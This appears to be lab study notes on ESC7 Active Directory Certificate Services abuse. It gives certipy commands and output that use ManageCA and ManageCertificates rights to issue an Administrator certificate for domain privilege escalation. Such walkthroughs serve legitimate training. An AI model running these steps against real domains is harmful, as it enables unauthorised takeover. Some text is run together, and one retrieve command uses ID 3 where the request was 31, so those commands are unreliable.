ESC7
Vulnerable Certificate Authority Access Control
A certificate authority holds a distinct set of permissions crucial for securing various CA functions.
CA Administrator (ManageCA right): This role allows managing the CA's settings, including using the
ICertAdminD2::SetConfigEntrymethod to adjust important configurations, like whether the CA accepts request attributes for Subject Alternative Names (SANs).Certificate Manager (ManageCertificates right): Also called a CA officer, this role focuses on managing issued certificates.
Abuse from Linux - ManageCA rights
certipy find -u '[email protected]' -p 'Password123!' -stdout -vulnerable
[!] Vulnerabilities
ESC7 : 'LAB.LOCAL\\Black Wasp' has dangerous permissionsThe ManageCertificates role allows us to approve pending certificate requests, which can be done with the ManageCA rights. Combining it with ManageCertificates roles, we can issue certificate requests that have failed.
SubCA template is also enabled by default. This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll.
# Enable SubCA
certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -enable-template 'SubCA'With ManageCA rights we assign ManageCertificate rights to any account.
certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -add-officer BlWaspWith the SubCA template enabled and with ManageCertificates rights, we can request a certificate by adding an alternative SAN and selecting the SubCA template.
mczen@htb[/htb]$ certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 31
Would you like to save the private key? (y/N) y
[*] Saved private key to 31.key
[-] Failed to request certificateError because we are not member of Domain Admins or Enterprise Admins. Save the request ID 31 and yes to save the key. With ManageCA and ManagerCertificates rights we issue the failed certificate request using certipy ca with -issue-request 31
mczen@htb[/htb]$ certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 31Retrieve the certificate with ID
certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 3Abuse from Linux - ManageCertificates rights
Request a certificate
mczen@htb[/htb]$ certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC7_1 -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[!] Certificate request is pending approval
[*] Request ID is 59
Would you like to save the private key? (y/N) y
[*] Saved private key to 59.key
[-] Failed to request certificateIt says the certificate request is pending approval, showing request ID 59. Save private key again and approve the request.
mczen@htb[/htb]$ certipy ca -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 59
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificateFinally retrieve the approved request
certipy req -u '[email protected]' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 59 Last updated
Was this helpful?